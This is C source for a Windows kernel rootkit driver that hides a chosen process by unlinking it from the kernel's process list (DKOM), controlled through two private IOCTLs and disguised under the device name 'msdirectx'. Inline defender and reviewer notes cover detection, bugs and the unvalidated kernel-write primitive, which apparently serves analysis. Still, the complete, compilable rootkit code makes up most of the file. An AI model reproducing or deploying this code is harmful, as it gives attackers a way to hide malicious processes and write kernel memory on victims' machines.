/*
 * Process-hiding kernel driver using direct kernel object manipulation (DKOM):
 * a user-mode client first sends IOCTL_ROOTKIT_INIT with two structure
 * offsets, then IOCTL_ROOTKIT_HIDEME with a PID, and the driver unlinks that
 * process's list entry from the doubly-linked process list so list-walking
 * enumerators no longer report it.  Defender's notes are inline; the
 * INIT/HIDEME pair also amounts to an unvalidated kernel-memory write
 * (see RootkitDeviceControl).
 */
#include "ntddk.h"
#include "stdio.h"
#include "stdlib.h"
/* Win32-style aliases that ntddk.h does not provide. */
typedef BOOLEAN BOOL;
/* NOTE(review): DWORD is used below to hold kernel *pointers* (see the
 * (DWORD) casts in FindProcessEPROC and RootkitDeviceControl).  As
 * unsigned long it only round-trips on a 32-bit kernel; on Windows x64
 * (LLP64) unsigned long is 32 bits and those casts truncate. */
typedef unsigned long DWORD;
typedef DWORD * PDWORD;
/* Private device type.  Both IOCTLs are METHOD_BUFFERED and demand
 * FILE_WRITE_ACCESS on the handle; nothing else gates them. */
#define FILE_DEVICE_ROOTKIT 0x00002a7b
#define IOCTL_ROOTKIT_INIT (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x01, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_ROOTKIT_HIDEME (ULONG) CTL_CODE(FILE_DEVICE_ROOTKIT, 0x02, METHOD_BUFFERED, FILE_WRITE_ACCESS)
/* Byte offsets into the process object (EPROCESS, per the naming used in
 * FindProcessEPROC) of the list link (Flink) and of the process id.  Both are
 * zero until IOCTL_ROOTKIT_INIT stores whatever the caller supplies; nothing
 * in this file validates them before they are used as memory offsets. */
int FLINKOFFSET;
int PIDOFFSET;
/* Control device created in DriverEntry. */
PDEVICE_OBJECT g_RootkitDevice;
/* User-visible symbolic link and device name.  "msdirectx" is not a DirectX
 * kernel component; an inventory of \DosDevices links / device objects on a
 * suspect host should treat this name as unfamiliar. */
const WCHAR deviceLinkBuffer[] = L"\\DosDevices\\msdirectx";
const WCHAR deviceNameBuffer[] = L"\\Device\\msdirectx";
#define DebugPrint DbgPrint
DWORD FindProcessEPROC(int);
NTSTATUS RootkitDispatch(IN PDEVICE_OBJECT, IN PIRP);
/* NOTE(review): declared as returning NTSTATUS but assigned to
 * DriverObject->DriverUnload in DriverEntry, whose callback type is
 * VOID (*)(PDRIVER_OBJECT). */
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT);
NTSTATUS RootkitDeviceControl(IN PFILE_OBJECT, IN BOOLEAN, IN PVOID,
IN ULONG, OUT PVOID, IN ULONG, IN ULONG,
OUT PIO_STATUS_BLOCK, IN PDEVICE_OBJECT
);
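/*
 * DriverEntry - create the control device and its user-visible symbolic
 * link, then install the dispatch and unload routines.
 *
 * DriverObject: driver object supplied by the I/O manager.
 * RegistryPath: service registry key path; unused.
 * Returns STATUS_SUCCESS, or the failing IoCreateDevice /
 * IoCreateSymbolicLink status.  The listing ignored the symbolic-link
 * status; on that failure the device object is now deleted again so a
 * failed load does not leave a dangling device behind.
 *
 * Defender's notes: IoCreateDevice is used without an explicit security
 * descriptor (not IoCreateDeviceSecure), so which users may open
 * \DosDevices\msdirectx and send the IOCTLs is left to the system default
 * device ACL.  An IRP_MJ_SHUTDOWN handler is installed, but the driver never
 * calls IoRegisterShutdownNotification, so that handler is never invoked.
 */
NTSTATUS DriverEntry(
    IN PDRIVER_OBJECT DriverObject,
    IN PUNICODE_STRING RegistryPath
    )
{
    NTSTATUS ntStatus;
    UNICODE_STRING deviceNameUnicodeString;
    UNICODE_STRING deviceLinkUnicodeString;

    (void)RegistryPath;

    RtlInitUnicodeString(&deviceNameUnicodeString, deviceNameBuffer);
    RtlInitUnicodeString(&deviceLinkUnicodeString, deviceLinkBuffer);

    ntStatus = IoCreateDevice(DriverObject,
                              0,        /* no device extension */
                              &deviceNameUnicodeString,
                              FILE_DEVICE_ROOTKIT,
                              0,        /* no device characteristics */
                              TRUE,     /* exclusive: one open handle at a time */
                              &g_RootkitDevice);
    if (!NT_SUCCESS(ntStatus)) {
        DebugPrint(("Failed to create device!\n"));
        return ntStatus;
    }

    ntStatus = IoCreateSymbolicLink(&deviceLinkUnicodeString,
                                    &deviceNameUnicodeString);
    if (!NT_SUCCESS(ntStatus)) {
        /* Without the link the device is unreachable from user mode and the
         * load fails anyway; undo the device creation rather than leak it. */
        DebugPrint(("Failed to create symbolic link!\n"));
        IoDeleteDevice(g_RootkitDevice);
        g_RootkitDevice = NULL;
        return ntStatus;
    }

    /* One routine handles every major function this driver accepts. */
    DriverObject->MajorFunction[IRP_MJ_SHUTDOWN] =
    DriverObject->MajorFunction[IRP_MJ_CREATE] =
    DriverObject->MajorFunction[IRP_MJ_CLOSE] =
    DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = RootkitDispatch;
    DriverObject->DriverUnload = RootkitUnload;

    return STATUS_SUCCESS;
}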
/*
 * RootkitUnload - DriverUnload routine: remove the symbolic link and the
 * device object created in DriverEntry.
 *
 * DriverObject: the driver being unloaded.
 * Always returns STATUS_SUCCESS.  NOTE(review): DriverObject->DriverUnload
 * has type VOID (*)(PDRIVER_OBJECT); the NTSTATUS return matches the
 * prototype at the top of the file, not the I/O manager's callback type.
 */
NTSTATUS RootkitUnload(IN PDRIVER_OBJECT DriverObject)
{
    UNICODE_STRING linkName;

    /* Nothing to tear down when no device object hangs off the driver. */
    if (DriverObject->DeviceObject == NULL)
        return STATUS_SUCCESS;

    RtlInitUnicodeString(&linkName, deviceLinkBuffer);
    IoDeleteSymbolicLink(&linkName);
    IoDeleteDevice(DriverObject->DeviceObject);
    return STATUS_SUCCESS;
}
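/*
 * RootkitDispatch - single dispatch routine for the CREATE, CLOSE, SHUTDOWN
 * and DEVICE_CONTROL IRPs registered in DriverEntry.
 *
 * DeviceObject: the control device; passed through to RootkitDeviceControl.
 * Irp: the request; always completed here with IO_NO_INCREMENT.
 * Returns the status stored in Irp->IoStatus.Status: STATUS_SUCCESS for
 * CREATE/CLOSE/SHUTDOWN (no work is done), whatever RootkitDeviceControl
 * reports for DEVICE_CONTROL, and STATUS_INVALID_DEVICE_REQUEST for any
 * other major function (the listing had no default arm).
 *
 * The IOCTLs are METHOD_BUFFERED, so input and output share
 * Irp->AssociatedIrp.SystemBuffer and the lengths come from the current
 * stack location; those parameters are only read for DEVICE_CONTROL.
 * Fix relative to the listing: "Irp->iOStatus" was a typo for IoStatus
 * and did not compile.
 */
NTSTATUS
RootkitDispatch(
    IN PDEVICE_OBJECT DeviceObject,
    IN PIRP Irp
    )
{
    PIO_STACK_LOCATION irpStack = IoGetCurrentIrpStackLocation(Irp);
    NTSTATUS ntstatus;

    ntstatus = Irp->IoStatus.Status = STATUS_SUCCESS;
    Irp->IoStatus.Information = 0;

    switch (irpStack->MajorFunction) {
    case IRP_MJ_CREATE:
    case IRP_MJ_SHUTDOWN:
    case IRP_MJ_CLOSE:
        /* Nothing to do; completed with STATUS_SUCCESS. */
        break;
    case IRP_MJ_DEVICE_CONTROL: {
        /* The Parameters union is only meaningful for DEVICE_CONTROL. */
        PVOID inputBuffer = Irp->AssociatedIrp.SystemBuffer;
        PVOID outputBuffer = Irp->AssociatedIrp.SystemBuffer;
        ULONG inputBufferLength = irpStack->Parameters.DeviceIoControl.InputBufferLength;
        ULONG outputBufferLength = irpStack->Parameters.DeviceIoControl.OutputBufferLength;
        ULONG ioControlCode = irpStack->Parameters.DeviceIoControl.IoControlCode;

        /* RootkitDeviceControl writes its result into Irp->IoStatus and
         * returns the same status. */
        ntstatus = RootkitDeviceControl(irpStack->FileObject, TRUE,
                                        inputBuffer, inputBufferLength,
                                        outputBuffer, outputBufferLength,
                                        ioControlCode, &Irp->IoStatus,
                                        DeviceObject);
        break;
    }
    default:
        /* Unreachable while DriverEntry registers only the four majors
         * above, but fail loudly rather than silently succeed. */
        ntstatus = Irp->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST;
        break;
    }

    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return ntstatus;
}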
/*
 * RootkitDeviceControl - handle the two private IOCTLs.
 *
 * IOCTL_ROOTKIT_INIT  : the caller supplies two ints which are stored
 *                       verbatim into the globals PIDOFFSET and FLINKOFFSET.
 * IOCTL_ROOTKIT_HIDEME: the caller supplies a PID; FindProcessEPROC locates
 *                       the process object and the LIST_ENTRY at
 *                       eproc+FLINKOFFSET is unlinked from its two
 *                       neighbours, so enumerators that walk this list no
 *                       longer see the process (DKOM).
 *
 * The result is written to IoStatus->Status and also returned; Information
 * is always 0.  FileObject, Wait, OutputBuffer, OutputBufferLength and
 * DeviceObject are accepted but unused, as are the locals ntStatus,
 * deviceLinkUnicodeString and start_eproc.
 *
 * Defender's notes:
 *  - The offsets come straight from the INIT caller and are never checked,
 *    so the two stores in the HIDEME arm are 4-byte kernel writes at
 *    caller-influenced addresses.  Whoever can open the device therefore
 *    holds an arbitrary kernel-write primitive, a local privilege-escalation
 *    risk independent of the hiding feature.
 *  - Only this one list is edited; the unlinked entry's own Flink/Blink are
 *    left as they were and the kernel's other bookkeeping of the process is
 *    untouched.  Cross-view detection (comparing a list-walk enumeration
 *    against one that does not use this list, or checking that each entry's
 *    neighbours point back to it) exposes the discrepancy.
 *  - No lock is taken around the list modification.
 */
NTSTATUS
RootkitDeviceControl(
    IN PFILE_OBJECT FileObject,
    IN BOOLEAN Wait,
    IN PVOID InputBuffer,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer,
    IN ULONG OutputBufferLength,
    IN ULONG IoControlCode,
    OUT PIO_STATUS_BLOCK IoStatus,
    IN PDEVICE_OBJECT DeviceObject
    )
{
    NTSTATUS ntStatus;
    UNICODE_STRING deviceLinkUnicodeString;
    int find_PID = 0;
    DWORD eproc = 0x00000000;
    DWORD start_eproc= 0x00000000;
    PLIST_ENTRY plist_active_procs = NULL;
    IoStatus->Status = STATUS_SUCCESS;
    IoStatus->Information = 0;
    switch ( IoControlCode )
    {
    case IOCTL_ROOTKIT_INIT:
        /* Requires 32 bytes (sizeof(int) * 8) although only two ints are
         * read below; an 8-byte payload is rejected by this check. */
        if ((InputBufferLength < sizeof(int) * 8) || (InputBuffer == NULL))
        {
            IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
            break;
        }
        /* Caller-controlled offsets stored without any range check. */
        PIDOFFSET = (int) (*(int *)InputBuffer);
        FLINKOFFSET = (int) (*((int *)InputBuffer+1));
        break;
    case IOCTL_ROOTKIT_HIDEME:
        if ((InputBufferLength < sizeof(DWORD)) || (InputBuffer == NULL))
        {
            IoStatus->Status = STATUS_INVALID_BUFFER_SIZE;
            break;
        }
        /* DWORD read into an int, then passed to FindProcessEPROC(int). */
        find_PID = *((DWORD *)InputBuffer);
        if (find_PID == 0x00000000)
        {
            IoStatus->Status = STATUS_INVALID_PARAMETER;
            break;
        }
        /* 0 means not found (or the offsets were never initialised). */
        eproc = FindProcessEPROC(find_PID);
        if (eproc == 0x00000000)
        {
            IoStatus->Status = STATUS_INVALID_PARAMETER;
            break;
        }
        /* Treat eproc+FLINKOFFSET as a LIST_ENTRY {Flink, Blink}. */
        plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
        /* Blink->Flink = Flink: the predecessor now skips this entry. */
        *((DWORD *)plist_active_procs->Blink) = (DWORD) plist_active_procs->Flink;
        /* Flink->Blink = Blink: "+1" on a DWORD* addresses the Blink slot,
         * which assumes 32-bit pointers (see the DWORD typedef). */
        *((DWORD *)plist_active_procs->Flink+1) = (DWORD) plist_active_procs->Blink;
        break;
    default:
        IoStatus->Status = STATUS_INVALID_DEVICE_REQUEST;
        break;
    }
    return IoStatus->Status;
}
/*
 * FindProcessEPROC - walk the circular process list, starting at the
 * current process, until the int at eproc+PIDOFFSET equals terminate_PID.
 *
 * terminate_PID: process id to look for; 0 returns 0 immediately.
 * Returns the process object's address as a DWORD (32-bit, so truncated on a
 * 64-bit kernel), or 0 once a full lap has come back to the starting id
 * without a match.
 *
 * Relies on PIDOFFSET and FLINKOFFSET having been set by IOCTL_ROOTKIT_INIT;
 * both are 0 before that, so the reads then land at offset 0 of the object.
 * The walk takes no lock and no reference on the objects it visits, so
 * concurrent process creation or exit can change the list underneath it.
 */
DWORD FindProcessEPROC (int terminate_PID)
{
    DWORD eproc = 0x00000000;
    int current_PID = 0;
    int start_PID = 0;
    int i_count = 0;   /* steps taken; the lap-complete test is skipped on step 0 */
    PLIST_ENTRY plist_active_procs;
    if (terminate_PID == 0)
        return terminate_PID;   /* i.e. 0 */
    /* Start at the process that issued the IOCTL. */
    eproc = (DWORD) PsGetCurrentProcess();
    /* DWORD read stored in an int; compared as int below. */
    start_PID = *((DWORD*)(eproc+PIDOFFSET));
    current_PID = start_PID;
    while(1)
    {
        if(terminate_PID == current_PID)
            return eproc;
        else if((i_count >= 1) && (start_PID == current_PID))
        {
            /* Back at the starting id after at least one step: not found. */
            return 0x00000000;
        }
        else {
            /* Follow Flink, then subtract the offset to get back to the
             * containing object (a hand-rolled CONTAINING_RECORD). */
            plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
            eproc = (DWORD) plist_active_procs->Flink;
            eproc = eproc - FLINKOFFSET;
            current_PID = *((int *)(eproc+PIDOFFSET));
            i_count++;
        }
    }
}